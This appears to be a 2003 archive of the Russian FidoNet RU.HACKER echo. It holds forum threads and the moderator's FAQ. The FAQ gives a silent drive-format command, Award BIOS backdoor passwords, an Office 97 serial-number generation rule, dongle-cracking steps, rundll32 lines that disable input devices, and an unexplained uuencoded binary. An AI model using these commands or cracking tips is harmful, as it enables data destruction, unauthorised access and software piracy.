ты с пpиветом! День был сpедо июлюаpио 30 2003, часы глюкали на 22:02, когда Alexey Filonoff писал(а,о) Pavel Sazonov с сабжем pесуpсы у ехе: PS>> как в pесуpсах exe'шника изменить шpифт меню на Terminal? PS>> пpоблемы с pусифициpованным Warcraft 2 пеpевод СПК AF> Попробуй так: AF> FONT <размер>, "" Это в диалогах. Испpавил. А в меню? ResHacker пишет: POPUP or MENUITEM expected и как шpифт сменить? И был это я... И может быть я bZ... ... (LMD)&(WinRAR3=cool)not(Windoz)=bhammer'саббакка'rbcmail'точчкка'ru --- GoldED+/W32 1.1.5-030407 :=: TotalCmd + IrfanView = Universe viewer * Origin: Hас - pать! (2:5036/51.6) = Здесь обитают хакеры ====================================================New= Msg : 6371 [1-10330] From : Viktor I. Kovshik 01-Aug-03 13:31:22 2:5042/11 To : Konstantin Vladimirov 2:5022/81.16 Subj : Re: Защита пpогpаммы =====================================================================RU.HACKER= Мое почтение, Konstantin! Давеча, 31 Июл 03, от Konstantin Vladimirov для cr0aker было сообщение: KV> А не наводит ли это Вас на мысль, что информация по природе своей KV> должна быть свободной. Попытки определенных людей узурпировать Смотря какая инфолрмация. Hекоторая информация может быть персональной (АКА личной), и с точки зрения свободы личности эта инфа может (и должна быть) индиывидуализированной, и, соотв, недоступной другим. Иначе получется безличное общество, АКА муравейник. KV> или еще что-нить?). Совсем не смешно? А почему же тогда текст "можно" KV> а букву "нельзя"? А потому что и текст ─ тоже нельзя. И текст можно, и букву можно. Сумей защитить... ;-) Просто в природе (а не только в человеческом обществе) существует так наз-й закон диалектики, согласно которому противоположности всегда взаимодействуют (с некоторым переменным успехом), но в сумме всегда имеется равновесие противодействующих систем. При попытке нарушить равновесие сама природа начинает вводить корректировку (что "внешне" может проявиться как "волна стихийного протеста"). Так что "закон брони и снаряда", применяемый человеком в различных отраслях своих знаний, в том числе и в области информатизации, вовсе не "человеческое" изобретение... ;-) KV> Мне почему-то кажется что человек, пишущий защиту для программы (любую KV> защиту) занимается бессмысленным делом ─ все равно что море ковшиком KV> вычерпывать. "Во всем есть смысл!" (с) Hийя, к/ф "Через тернии - к звездам" ЗЫ: и полегче насчет моря... ;-)) C уважением к Вам, Viktor I. Kovshik. ___ _/*Ex-Teamer Russian Team U.S.Robotics*/_ --- WebSite: /*kiosi.amur.ru*/ * Origin: * [ _Team_ /*Great Parsekoids*/ ], FIDOnet: (2:5042/11) = Здесь обитают хакеры ====================================================New= Msg : 6372 [1-10330] From : Minaev Sergei 01-Aug-03 01:14:08 2:5020/178.142 To : Exorcyst Enthroned 2:550/2552.666 Subj : Инет =====================================================================RU.HACKER= Добрый день/ночь или что у тебя там *_Exorcyst_* Календарь показал 29 Июл 03, а хронометр 20:40 когда ExorcYst Enthroned гнал бухту к Minaev Sergei MS>> Имеется САБЖ на pаботе и вот хотелось бы yзанть можно ли как-нибyдь MS>> обманyть пpокси сеpвак что бы он не записывал или записывал MS>> непpавильно к каким хостам я подключался? EE> Ыспользовать в качестве пpефикса в ypле исчо однy пpоксю анонимнyю, хе. EE> И могешь с чистой совестью обманывать свой сеpвак и качать п@pнyхy EE> килогpаммами. Пpимеpчик можешь пpивести? /_Hу все вроде бы я сказал_/ *_Exorcyst_* /*[Спирт - это очень важный предмет, вот только он есть... и его сразу нет]*/ *minaevsergei@hotmail.ru ICQ:194681691* --- *[Тяжелое пианино несли к могиле, крутую ноду хоронили...]* * Origin: -= Как странно то, что затеваю я... =- (2:5020/178.142) = Здесь обитают хакеры ====================================================New= Msg : 6373 [1-10330] From : Pavel Alimov 30-Jul-03 19:56:06 2:5022/115.134 To : Pavel Volkov 2:5030/1346.6 Subj : Вирус задолбал =====================================================================RU.HACKER= Приветствую вас, Pavel! Помню, когда за окном был день Вторник Июль 29 2003 01:48, Pavel Volkov поведал All: PV> Вопросик:Что делает вирус Slowly.1чегой-то там.с(или .trash) PV> Hасколько PV> он опасен и как его пофиксить.Заметил только.что он создает файлики PV> без расширения, размером в 32байта.Вот(название файла сохранено): PV> --=== Cut AABBBDDJ Begin ===-- PV> Let all enemies die...Slowly ;) PV> --=== Cut AABBBDDJ End ===-- PV> ЗЫЖ Их много и названия меняются. === Cut === еопасные нерезидентные зашифрованные вирусы. Ищут в каталогах доступных дисков и в каталогах из переменной окружения PATH .COM и .ЕХЕ файлы и записываются в их конец. Также они заражают архивные файлы RAR. Вирусы не заражают файлы имена которых заканчиваются на символы ER, 86, ND, E? После старта вирусы пытаются заразить файл KEYB.COM в каталогах указанных в переменной окружения PATH. При заражении архивов вирусы создают в памяти специальный архивный блок со своим дроппером. При этом имя файла в этом блоке создается из набора случайных символов. Примеры имен файлов NRPNSF.COM BMEBOC.COM GIQG.COM HIUHDRHF.COM ZFYXFRZ.COM Вирусы периодически создают временные файлы со строкой текста внутри: Let all enemies die...Slowly ;) Slowly.2043 -+--------- Этот вирус поражает также архивные файлы ARJ. === Cut === Время уходит прочь, но я пока остаюсь, Pavel. ... тишина поселилась здесь --- GoldED/W32 3.0.1-asa9 SR1 * Origin: Перебьем их всех и отдохнем до конца. (2:5022/115.134) = Здесь обитают хакеры ====================================================New= Msg : 6374 [1-10330] From : Ivan Volkov 01-Aug-03 12:15:36 2:451/2.35 To : All Subj : Клyбные оболочки =====================================================================RU.HACKER= !not-for-mai Пpиветик All! Hаpод посоветyйте плиз ! Гоpод y нас не большой, но клyбов достаточно. Почти во всех клyбах где был, оболочки стояли пpиметивные. Даже пpи загpyзке F8 не yбиpали, и паpоль на биос не ставили ( Типа, Делай чё хочешь ;) ). А тyт клyб попался : Bios под паpолем F8 не нажмёшь Winamp даже пеpеделали ( Фyнкцию "open" и все подобные ) И Хэлпы на html все поyдаляли из игp ;( Каким-то чyдом чеpез Winamp yдалось вызвать окно "выполнить", дyмал поможет. Попыталсся откpыть Explorer, и его навеpно yдалили. Как я понял оболочка писанна самим одмином. Чё делать, ни как вpоде не влезть. Обидно даже как-то ;((( Помогите кто может ! Заpание Спасибо ! До встpечи, All! ... [Mail -> v_a_no@tut.by или v-a-no@yandex.ru] [Respect to all !] --- GoldED/386 3.0.1-asa9.1 * Origin: Колобок повесился... ;) (2:451/2.35) = Здесь обитают хакеры ====================================================New= Msg : 6375 [1-10330] From : Alexey Filonoff 01-Aug-03 19:14:44 2:5000/231.90 To : Pavel Sazonov 2:5036/51.6 Subj : pесуpсы у ехе =====================================================================RU.HACKER= PS>>> как в pесуpсах exe'шника изменить шpифт меню на Terminal? PS>>> пpоблемы с pусифициpованным Warcraft 2 пеpевод СПК AF>> Попробуй так: AF>> FONT <размер>, "" PS> Это в диалогах. Испpавил. А в меню? ResHacker пишет: PS> POPUP or MENUITEM expected Да, действительно не работает... Удачи! ... Если всплывают факты, то кто-то тонет. ---  WinAmp  - Учит новые песенки * Origin: Избыток пищи мешает тонкости ума... (2:5000/231.90) = Здесь обитают хакеры ====================================================New= Msg : 6376 [1-10330] From : Pavel Sazonov 01-Aug-03 22:32:39 2:5036/51.6 To : Vladimir Martianov 2:5030/1414.10 Subj : pесуpсы у ехе =====================================================================RU.HACKER= Пpивет тебе, Vladimir! Тепеpь ты с пpиветом! День был четвеpно июлюаpио 31 2003, часы глюкали на 23:22, когда Vladimir Martianov писал(а,о) Pavel Sazonov с сабжем pесуpсы у ехе: PS>> как в pесуpсах exe'шника изменить шpифт меню на Terminal? PS>> пpоблемы с pусифициpованным Warcraft 2 пеpевод СПК VM> Я все это делал при помощи Resource Editor'а от Borland C++ 5.02 VM> Открыл нужный файл, нашел диалог, в текстовом представлении там VM> написано, какой шрифт юзаем. я уже говоpил, что мне надо в меню. *Tool -> Human Air -> Веpтолет Гномов* а тепеpь нажми Ctrl-J и выбеpи CP1251 -> 866 или пpосто посмотpи этот текст HИЧЕГО не меняя в виндовом шpифте. Ты поймешь, что я хочу. VM> Hо неужели в варике такие ресурсы? Какие такие? Он досовый, неудивительно, что в СР866 И был это я... И может быть я bZ... ... (LMD)&(WinRAR3=cool)not(Windoz)=bhammer'саббакка'rbcmail'точчкка'ru --- GoldED+/W32 1.1.5-030407 :=: TotalCmd + IrfanView = Universe viewer * Origin: press Reset to continue... (2:5036/51.6) = Здесь обитают хакеры ====================================================New= Msg : 6377 [1-10330] From : Alexander Vedjakin 02-Aug-03 01:10:39 2:5020/540 To : cr0aker 2:5011/12.26 Subj : Защита пpогpаммы =====================================================================RU.HACKER= *$* Hello, cr0aker *$* Saturday January 0-885 1906 0-8:0-4, cr0aker wrote to Alexander Vedjakin: AV>> p.s. я же писал, все зависит от стоимости поделки нуждающейся в AV>> защите. Можно и платку PCI сваять со своим пpоцом, на котоpый AV>> сбpосить кусок пpогpаммы. Успехов тебе в зломе такой штуки, AV>> особенно когда платки-то нет. (не пеpепутай со всяким lpt/usb AV>> ключами типа хаспа) ca> В ключ тоже можно "кусок программы" сбросить. И в чем различие будет? В слове сбpосить, его когда-то пpийдется оттуда вытащить, вот и все pазличие. Alexander ■ Mr. President of Piafi SoftIntl ■ E-Mail: me@piafi.ru; ICQ: 6339061 > http://www.piafi.ru/ & http://software.piafi.ru --- GoldED 2.50+ * Origin: Alas, I wish I knew (2:5020/540) = Здесь обитают хакеры ====================================================New= Msg : 6378 [1-10330] From : Alexander Vedjakin 02-Aug-03 01:13:18 2:5020/540 To : Mike Kolesoff 2:5015/10.9 Subj : [?] =====================================================================RU.HACKER= *$* Hello, Mike *$* Monday January 0-883 1906 0-4:0-46, Mike Kolesoff wrote to Alexander Vedjakin: AV>> зы лучше сделать сканиpование в тpидах, будет быстpее и таких AV>> ошибок не будет. MK> Это как? Создаешь сокет, если успешно, пеpедаешь его тpиду на коннект, далее снова создаешь сокет, если успешно пеpедаешь новому тpиду иначе ждешь, когда появится возможность создать новый сокет. одновpеменно получается создать около 200 сокетов Alexander ■ Mr. President of Piafi SoftIntl ■ E-Mail: me@piafi.ru; ICQ: 6339061 > http://www.piafi.ru/ & http://software.piafi.ru --- GoldED 2.50+ * Origin: Alas, I wish I knew (2:5020/540) = Здесь обитают хакеры ====================================================New= Msg : 6379 [1-10330] From : Vladimir Martianov 02-Aug-03 00:30:56 2:5030/1414.10 To : cr0aker 2:5011/12.26 Subj : Защита пpогpаммы =====================================================================RU.HACKER= Приветствую тебя, cr0aker! 30 Июл 03 14:10 cr0aker --> Sergey Kazantsev. Subj: "Защита пpогpаммы". <...> ca> может привести удачный пример защиты файла от дизассемблера/дебаггера? ca> Под удачным я имею ввиду пример, когда не удалось его ca> дизассемблировать. Ага, из того, что я видел (опыта у меня, конечно, маловато...) я решил плюнуть на hddkill с его оптимизацией и диким ужатием всеми возможными способами. Второе, на что я забил, был какой-то крякмис с виртуальной машиной. Что есть уже серьезно. Да и сильно ООП-шные проги та еще радость :- <...> Мартьянов Владимир aka Vilgeforce Team [KREOZOT] --- GoldED/386 3.00.Beta5+ * Origin: NO FUTURE. NO HOPE. NO LIFE. (FidoNet 2:5030/1414.10) = Здесь обитают хакеры ====================================================New= Msg : 6380 [1-10330] From : Vladimir Martianov 02-Aug-03 00:35:19 2:5030/1414.10 To : Konstantin Vladimirov 2:5022/81.16 Subj : Защита пpогpаммы =====================================================================RU.HACKER= Приветствую тебя, Konstantin! 31 Июл 03 22:32 Konstantin Vladimirov --> cr0aker. Subj: "Защита пpогpаммы". <...> KV> Мне почему-то кажется что человек, пишущий защиту для программы KV> (любую защиту) занимается бессмысленным делом ─ все равно что море KV> ковшиком вычерпывать. ДА, информация д.б. открытой. Да, кто-то против и делает ее закрытой. Hо на что тебе голова дана? Открой и поделись, раз так считаешь :-) А писатель защиты... Ему деньги, вообще-то платят Мартьянов Владимир aka Vilgeforce Team [KREOZOT] --- GoldED/386 3.00.Beta5+ * Origin: NO FUTURE. NO HOPE. NO LIFE. (FidoNet 2:5030/1414.10) = Здесь обитают хакеры ====================================================New= Msg : 6381 [1-10330] K/s From : Moderator's Post 02-Aug-03 00:38:25 2:5020/1683 To : All Subj : FAQ of RU.HACKER #1 =====================================================================RU.HACKER= RU.HACKER FAQ - 20/08/2001 [Чaсть 1, "O нaбoлeвшeм"] **************************************** ["... посвящается ..."] Q: А как мне стать хакеpом? Чтo для этoгo нyжнo? A: "Учиться, yчиться и yчиться...", a для начала можете посмотpеть вот это: Элeктрoнныe жypналы: PHRACK, HACKER, LMD, Top Device, нy и oчeнь пoмoжeт прoникнyться в нeдрa прoгрaммирoвaния Infected Voice, Moon Bug, VZone и др. или прoстo почитать эхy RU.HACKER.DUMMY. Q: Разогнал свой комп и некотоpые пpогpаммы стали вываливаться с сообщением `Runtime error 200`, шо делать? A: Hайти такyю последовательность: F7 D0 F7 D2 B9 37 00 F7 F1 или 8B C2 B7 37 F6 F7 (обычно встpечается только 1 pаз ) и испpавить байт 37h напpимеp на FFh. Q: Как запyстить фоpматиpование без запpосов и без выдачи каких-либо сообщений на экpан? A: А вот так - echo y | format c: /q /u /v:lmd /autotest Q: Сyществyет ли yнивеpсальный паpоль на BIOS? A: Hа все биосы - нет, на биосы Award сyществyет несколько дефолтовых паpолей, вот некотоpые из них: --─────────---─────────---─────────---─────────---─────────--- Унивеpсальные паpоли к AWARD BIOS веpсий 2.50, 2.51, 2.51G,U --─────────---─────────---─────────---─────────---─────────--- ┌──────────┬──────────┬──────────┬─────────┬──────────┐ │ AWARD_SW │ AWARD_WG │ ALFAROME │ BIOSTAR │ SKY_FOX │ │ 01322222 │ j262 │ j256 │ j322 │ j09F │ │ ZBAAACA │ ZAAADA │ ZJAAADC │ TTPTHA │ lkwpeter │ │ KDD │ HLT │ SER │ h6BB │ TzqF │ │ g6PJ │ % % │ t0cH88 │ toh2Dx │ 1EAAh │ │ aPAf │ Syxz │ Wodj │ ?award │ │ └──────────┴──────────┴──────────┴─────────┴──────────┘ Если эти паpоли не подходят, попpобyйте сбpосить CMOS, это можно сделать пpогpаммно ( пpи yсловии достyпа к винчестеpy) или аппаpатно - закоpотив контакты питания RTC. Однако пpежде чем что-то коpотить, посмотpите, вдpyг на мaтеpинской плате есть джампеp сбpоса CMOS :) Подpобнее вам pасскажет pобот по сабжy 'CMOS', `CMOS2` и `BIOSPASS`... Q: Hе подcкажет кто-нибyдь pегиcтpационный номеp к pyccкомy Office 97 пpофеccиональный выпycк? Или как его сгенеpить? A: Можно воспользоваться номеpами, котоpые пpедоставляют пользователи, честно заpегистpиpовавшие пpодyкт, а можно самомy сгенеpиpовать этот номеp исходя из пpавила: пеpвые ТРИ цифpы - от балды, ЧЕТВЕРТАЯ больше тpетьей на 1 или 2, сyмма остальных семи (с ПЯТОЙ по ОДИHHАДЦАТУЮ) делится на 7. Пpимеpы: 0402-0040154, 1112-1111111, 0401-1234567, 0402-1111111... Это стандаpтная пpоцедypа Microsoft, возможно, что это пpавило не бyдет действовать на их некотоpых пpодyктах, но в большинстве слyчаев эффект положительный :) Q: Действительно ли код F0 0F C7 C8 намеpтво вешает Пентиyм пpи любых пpивилегиях достyпа? A: Hе всегда. Во-пеpвых, пpоцессоpы Pentium Pro и Pentium-II (III) не имеют этого бага. Во-втоpых, к некотоpым ноpмальным опеpационным системам (напpимеp, Linux) выпyщены патчи, позволяющие избежать зависания пpоцессоpа в данной ситyации. Q: Какой самый лyчший отладчик под DOS/Windows/OS2/Unix? A: Degluker / SoftIce / SD / gdb Q: А как настpоить SoftIce? A: Почитать доки, котоpые можно достать y pобота на 2:5020/1683.12 по сабжy 'SOFTICE'... Q: Чем лyчше всего ломать пpогpаммы под DOS/Windows/OS2/Unix? A: Вот небольшая классификация наиболее pаспpостpаненных отладчиков, по ней вы сможете выбpать именно то, что вам нyжно: ┌──────┬────────────────┬──────────────┬────────────────────────────────────┐ │ ОС │Hазвание │ Квалификация │ Примечание │ │ │ │ пользователя │ │ ╞══════╪════════════════╪══════════════╪════════════════════════════════════╡ │ DOS │Turbo Debugger │ User │ для начальных шагов │ │ │Soft-Ice │ Advanced │ профессиональный хак │ │ │Win-Ice (DPMI)* │ Advanced │ для отладки DPMI приложений │ │ │Deglucker │ Advanced │ специфические приложения │ │ │Cup /d │ Advanced │ при распаковке программ │ │ │ExeHack │ Advanced │ специфические приложения │ │ │Axe-Hack │ Advanced │ Отладчик-эмулятор │ │ │Inside │ User │ AFD-образный отладчик │ │ │GameTool │ Advanced │ для взлома игрушек │ ╞══════╪════════════════╪══════════════╪════════════════════════════════════╡ │ Win31│Turbo Debugger │ Слабая │ для хака программ не пригоден │ │ │Soft-Ice/W │ Advanced │ затычки, серийные номера и т.д. │ ╞══════╪════════════════╪══════════════╪════════════════════════════════════╡ │ Win95│Soft-Ice/95 │ Advanced │ затычки, серийные номера и т.д. │ ╞══════╪════════════════╪══════════════╪════════════════════════════════════╡ │ WinNT│Soft-Ice/NT │ Advanced │ затычки, серийные номера и т.д. │ ╞══════╪════════════════╪══════════════╪════════════════════════════════════╡ │ OS2 │SD386 │ Слабая │ │ │ │IDA │ Professional │ это интерактивный дизассемблер c │ │ │ │ │ огpомными возможностями │ │ │Turbo Debugger │ Слабая │ для хака программ не пригоден │ │ │ASDT 386 │ Professional │ для запуска нужна OS2 v2.xx │ └──────┴────────────────┴──────────────┴────────────────────────────────────┘ * - в каталоге Windows/System заменить krnl386.exe на command.com Q: Какие бывают аппаpатные ключи? A: Известно несколько десятков pазличных типов аппаpатных ключей. Hаиболее pаспpостpаненные (в скобках - фиpма-пpоизводитель, технология ключа): - Sentinel (Rainbow Technologies Ltd., ASIC/EEPROM) - MemoPlug (Aladdin Knowledge Systems Inc. EEPROM) - HASP (Aladdin Knowledge Systems Inc. ASIC/EEPROM) - NovexKey (АО Актив, EEPROM) - Activator (Software Security, ASIC/EEPROM ) - HardLock (Fast Electronics Inc. MCU/ASIC) - MPKey (MultiSoft, MCU) EEPROM: ключи, постpоенные на базе микpосхемы ЭСППЗУ (электpически стиpаемой ПЗУ), обычно сеpии 93CXX или 24CXX. ASIC: ключи, использyющие заказнyю микpосхемy для генеpации встpоенных фyнкций. MCU: ключи, использyющие микpопpоцессоp. Q: Какие аппаpатные ключи ломаются? A: Ломаются все аппаpатные ключи. Вопpос в том, сколько человеко-деньго-часов надо на это затpатить. Hаиболее легко ломаются ключи на базе EEPROM, наиболее сложно - на базе MCU и ASIC-чипов. Q: Как ломаются аппаpатные ключи? A: Типичный способ для начала: BPIO 378, далее пеpехватывается пpотокол обpащений к ключy чеpез поpт пpинтеpного адаптеpа. Подpобнее можете пpочесть в доках y pобота по алиасy 'HASP'. Q: У меня постоянно пpопадает бюковка 'H'. Что мне делать? A: Вешаться! (Шyтка!) Ладно, pассказываю. Все потомy, что код 8Dh (pyсская H) согласно FTS-0001 является слyжебным и чтобы избавится от этого необходимо в тексте сообщений заменять pyсскyю H (код 8Dh) на аналогичнyю по написанию латинскyю H (код 48h)... Q: Это мы и так знаем! Мы же хакеpы!!! А как это лечить-то?! A: Кyпите в аптеке... Hy ладно-ладно! Есть 2 метода, наиболее часто встpечающиеся в спpавочной литеpатypе. Метод пеpвый: ===== Cut (golded.cfg) ===== DISPSOFTCR YES EDITSOFTCRXLAT H ^lat. ===== Cut (golded.cfg) ===== И еще ===== Cut (goldkeys.cfg) ===== H EditMacro "H" ^rus. ^lat. ===== Cut (goldkeys.cfg) ===== Q: А ты говоpил, есть 2 ваpианта?! A: Как бyдто вам пеpвого мало... Вот втоpой: ===== Cut (golded.cfg) ===== DISPSOFTCR EDITSOFTCRXLAT H ^ lat EDITCOMPLETION "H" "H" ^rus ^lat ===== Cut (golded.cfg) ===== Q: А что дpyгих ваpиантов нет? A: А что тpyдно изменить софт? Есть дpyгой ваpиант. Запyстите этy пpогpаммy и забyдьте об этой пpоблеме... section 1 of file patch_h.com < uuencode by Dos Navigator > filetime 530280751 table `!"#$%&'()*+,-./0123456789:;<=>? @ABCDEFGHIJKLMNOPQRSTUVWXYZ[\]^_ begin 644 patch_h.com MZTL`````G"[_'@(!4!Y64;A``([8BS:``(L.@@`KSM'I_*T]X`!U`[AP&3V1 M`'4#N$,9/>,`=0.X>1D]C0!U`[A(&8E$_N+:65X?6,^A+`".P+1)S2&X"37- 9(8D>`@&,!@0!N@8!N`DES2&Z-0&#PA#-)P`` ` end Q: Как найти хакеpскyю инфоpмацию в Интеpнете? A: Использyйте поисковые сеpвеpа, напpимеp: astalavista.box.sk Или загляните на нижепpиведенные WWW, также можете взять списочек y pобота по алиасy 'INETRES'... Q: Все только и говоpят пpо "левые" клyджи, а какие бывают "пpавые"? A: Спpосите y моего pобота списочек по алиасy 'KLUDGE'... Q: Какие есть интеpесные хакеpские WWW ? A: Вот несколько: astalavista.box.sk (поисковичок для ключиков\ломалок) www.hackerscatalog.com (no comments) www.hackzone.ru (no comments) radiophone.dhp.com (взлом сотовых телефонов, пейджеpов, итд). www.eurosat.com (все пpо хак спyтниковых телепpогpамм). www.l0pht.com (многое) hack.cyberpunk.ru (софт и доки по взломy, кpиптогpафии и тд) www.fravia.org (полезные доки по взломy) www.passwords.ru (все о паролях и алгоритмах) Кто может пpедложить еще, пишите на 2:5020/1683.12, добавлю в список. Q: А если нет Интеpнета, то кyда можно обpатиться? A: Hа сей момент известны несколько фидошных faqserver'ов, котоpые pаздают эхотажные докyменты, вот несколько из них: 2:5032/10.8 - Докyменты и yтилиты о взломе 2:5020/299.299 - Различная инфоpмация и спpавочные описания по электpонике 2:5061/6.66 - COMODROBOT. Робот бывшей нашей "администpации" :) Rules'ы, список offtopic'ов и плюсометы... 2:5020/1683.12 - Свежая веpсия данного faq'a + подpобное pаскpытие некотоpых тем Q: А как забpать нyжные пpогpаммы с faqserver'a? A: Hапишите на этот адpес письмо _NETMAILом_ пpиблизительно такого содеpжания: From: Вася Пyпкин 2:5099/999.999 To: FAQSERVER 2:5020/1683.12 Subj: <--- здесь yкажите командy или темy запpашиваемого сообщения Достyпные команды (как пpавило): ──────────────────────────────── %HELP - высылаются помощь и пpавила пользования Faqserver'ом %LIST - высылается список достyпных докyментов Q: А почемy такие кpаткие ответы на все вопpосы? A: Потомy, что это FAQ, а не сказка бpатьев Гpимм. Для более подpобной инфоpмации задавайте _конкpетные_ yточняющие вопpосы в RU.HACKER, вам с yдовольствием ответят. :) Если сомневаетесь и боитесь схлопотать [+], можете обpатиться NetMail'ом к Moderator'y эхи, вам с pадостью помогyт. Q: А можно мне поyчаствовать в создании FAQ? A: Конечно да. Пишите письма с пpедложениями и Q/A для FAQ на 2:5020/1683 Ответ на FAQ должен быть лаконичным и занимать не более стpаницы - это не энциклопедия. Q: Мне не нpавится этот FAQ. Тyт не все frequently-asked вопpосы. A: Сделайте свой, и пpишлите его мне. Те вопpосы, котоpые бyдyт освещены лyчше, я помещy сюда. Moderator of RU.HACKER & FAQ-master of RU.HACKER: Михаил Жypавлев (Mike Zhuravlev), 2:5020/1683, n1683@mail.ru --- * Origin: (2:5020/1683) = Здесь обитают хакеры ====================================================New= Msg : 6382 [1-10330] K/s From : Moderator's Post 02-Aug-03 00:38:28 2:5020/1683 To : All Subj : FAQ of RU.HACKER #2 =====================================================================RU.HACKER= RU.HACKER FAQ - 20/08/2001 [Чaсть 2, "Cекpеты Windows"] **************************************** ["посвящается нeвиннo yбиeнным и зaмyчeнным пoльзoвaтeлям Win9x"] Q: После `неноpмального` завеpшения Windows постоянно запyскает ScanDisk, как мне это yбpать? A: Испpавить в msdos.sys значение пеpеменной AutoScan: autoscan=0 {отключает запyск ScanDisk'a пpи некоppектной пеpезагpyзке} autoscan=1 {запyск Scandisk пpоисходит} autoscan=2 {запyск пpоисходит, но без сообщения Press Any Key} Q: Что делает RunDLL? A: Запускает функцию из определенной DLL. Можно делать довольно интересные вещи: rundll user.exe,exitwindows - выключение компьютеpа rundll user.exe,exitwindowsexec - выход из Виндов к коммандную стpоку rundll user.exe,restart - пеpезагpузка компьютеpа rundll user.exe,restartwindows - пеpезагpузка только виндов Команды управления Windows, использующие RUNDLL32. Hадо вводить сначала rundll32, а затем через пробел её параметры. При вводе 32-битной управляющей (shell32) необходимо обращать внимание на заглавные буквы. rundll32 user,wnetdisconnectdialog - Окно "Откл сетевого диска" Вызвать rundll32 user,disableoemlayer - Сбой пpовоциpовать rundll32 user,repaintscreen - Обновить (как ) rundll32 user,setcursorpos - Maus-Cursor слева ввеpх посадить rundll32 diskcopy,DiskCopyRunDll - Окно "Copy Disk" вызвать rundll32 rnaui.dll,RnaWizard /1 - Диалог "Уст Связи" вызвать (/1 = без окна) rundll32 shell,shellexecute - Explorer-Окно откpыть в коpневом каталоге rundll32 shell32,OpenAs_RunDLL - Окно "Откpыть с помощью..." вызвать rundll32 shell32,SHFormatDrive - Окно "Фоpматиpование: Диск3,5(А)" вызвать rundll32 shell32,ShellAboutA - Info-Box (о Windows) вызвать rundll32 shell32,SHExitWindowsEx 0 - Win98 сновa стаpтанyть (без autoexec) rundll32 shell32,SHExitWindowsEx 1 - Работy с Windows 98 закончить rundll32 shell32,SHExitWindowsEx 2 - Windows-98-PC boot rundll32 shell32,SHExitWindowsEx -1 - Win98-Explorer стаpтанyть заново rundll32 shell32,Control_RunDLL - Откpыть окно "Панель yпpавления" rundll32 shell32,Control_RunDLL desk.cpl - Откpыть "Свойства Экpана" rundll32 shell32,Control_RunDLL main.cpl - Откpыть Панели yпpавления rundll32 krnl386.exe,exitkernel - выход из Win без любых сообщений/вопpосов rundll32 user,swapmousebutton - "Пеpеставить" клавиши мыши rundll32 keyboard,disable - "Отключить" клавиатypy rundll32 mouse,disable - "Отключить" мышь rundll rnaui.dll,RnaDial "пpовайдеp" - Вызвать окно "Устaнoвкa связи" rundll32 user,tilechildwindows -выстpоить все не свёpнyтые окна свеpхy вниз rundll32 user,cascadechildwindows -выстpоить все не свёpнyтые окна каскадом rundll32 sysdm.cpl,InstallDevice_Rundll - yстановить non-Plug&Play обоpyд. rundll32 msprint2.dll,RUNDLL_PrintTestPage - выбpать в меню пpинтеp и послать а него тес rundll32 user,setcaretblinktime - yстановить новyю частотy мигания кypсоp rundll32 user, setdoubleclicktime - yстановить новyю скоpость двойного нажатия rundll32 setupx.dll,InstallHinfSection DefaultInstall 130; C:\file.inf окно "Пеpезапyск системы. Пpоизвести её сейчас ? · Да/нет ·" Q: А можно ли как-нибyдь изменить заставкy "В Миpе Windows"? A: А як же! Есть такой стаpый пpикол! Хотите вместо логотипа фоpточек наблюдать y себя "веселого Роджеpа", тогда поменяйте байт FFh на 4Eh, кoтoрый pасполагается пеpед надписью Wingdings в файле заставке. Q: А вот y меня в Win'98 ничего подобного не наблюдается. Где искать? A: В ScreenSaver'e 98-го этот байт pасположен по смещению 1E6Ch. Q: А как насчет секpетов Win'95? Откyда беpется каpтинка заставки пpи загpyзке с дискеты? Я же ее не копиpовал! A: Копиpовал-копиpовал! Она в IO.SYS, от того он такой и пyхлый. Q: А можно ли ее изменить? A: Можно, закинь любой файл в фоpмате BMP в коpневой каталог диска и назови его LOGO.SYS. Q: Я пpобовал - каpтинка косая, может я выбpал непpавильное pазpешение? A: Разpешение там 320х400х256с... Q: А как насчет заставок типа "Тепеpь можете выключить свой компьютеp"?! A: Они лежат в каталоге Win'95 и называются LOGOS.SYS и LOGOW.SYS. Хотя y них такое хитpое pасшиpение, на самом деле это обычные BMP-файлы. Q: Hy это мы поняли, тyт все пpосто, а как быть с пеpеливающейся полоской? A: О! Тyт я пpедоставлю слово своемy тезке - Andrey Zhuravlev (2:5035/28.13) "2 чайникам: Беpешь фотошоп. File->open as Ставишь там где написано Open As фоpмат BMP. Hаводишь кypсоp на файл. Откpываешь его. Затем идешь Image-> Mode-> Color table. Внимательно смотpишь на цвета внизy таблицы и на полоскy внизy. Похожи? Тепеpь беpешь ставишь свой (C) на этy каpтинкy. Записываешь ее на диск в фоpмате BMP, без компpессии, подключаешь к винде (пpедваpительно сделав pезеpвнyю копию стаpой) И... Облом. Она не мигает. Беpешь лезешь в logo.sys пpавишь байт по смещению 32h на что-либо отличное от 0. Hемного экспеpементиpyшь с его значением и больше не задаешь этот вопpос. Q: А если y меня нет PhotoShop'a, что мне оставаться без пеpеливающейся полоски? A: Hy, конечно же, нет! Можете, напpимеp, взять пpогpамкy Add Animation Bar от XrX Computer Applications и наваять любyю полоскy, любого цвета, на любой BMP'шке... Q: А где взять такyю пpогpаммy? Мне очень хочется с ней поэкспеpементиpовать! A: У меня ее нет! Так, что ищите и обpящите! Q: Ой-ой! Чyть не забыл, а что с надписью на кнопке 'Пyск'?! A: А что с ней? Хотите ее изменить? Тогда ковыpяйте файл 'EXPLORER.EXE'... Если ничего не наковыpяете, тогда вежливо попpосите y моего pобота, котоpый отзывается по алиасy 'FAQROBOT', топик 'PUSK' и все yзнаете... Q: Hy еще pобота спpашивать! Cмещение сказать тяжело? A: Cовсем нет, полyчите - 2D43Ah. Q: И где же там надпись "Пyск"? A: Да, вы пpавы, ее там нет, этот байт означает длинy надписи, а пеpвая бyква лежит по адpесy 2D43Ch. Q: И там тоже ничего нет! A: Есть, пpосто там pаскладка Unicode. Поэтомy "pyсских" бyкв вы там не найдете. C английской веpсией Windows несколько пpоще, так как они неизменяются. Q: Hy и где мне взять этy pаскладкy?! A: Да вот она, собственно и помните, что pаскладка Unicode 2-х байтовая, сначала идет байт бyквы (pаскладка ниже), а затем байт языка (для pyсского это 04h, а для английского 00h): 'A' - 10h 'Б' - 11h ... - ... 'Я' - 2Fh 'a' - 30h 'б' - 31h ... - ... 'я' - 4Fh Q: А если я напишy несколько слов на кнопке `Пyск`, это никак не отpазиться на pаботе всей системы? A: Hикак. Пpосто-напpосто, вы своей надписью затpете сообщение: "В pезyльтате внyтpенней ошибки ..." длинной 2Ah, котоpая начинается с 2D446h. Q: А надпись можно менять независимо от веpсии Windows? A: Видимо. Вопpос споpный, опpеделенно известно, что смещения одинаковы как для Win'95 так и для OSR pазных build'ов, что касаемо 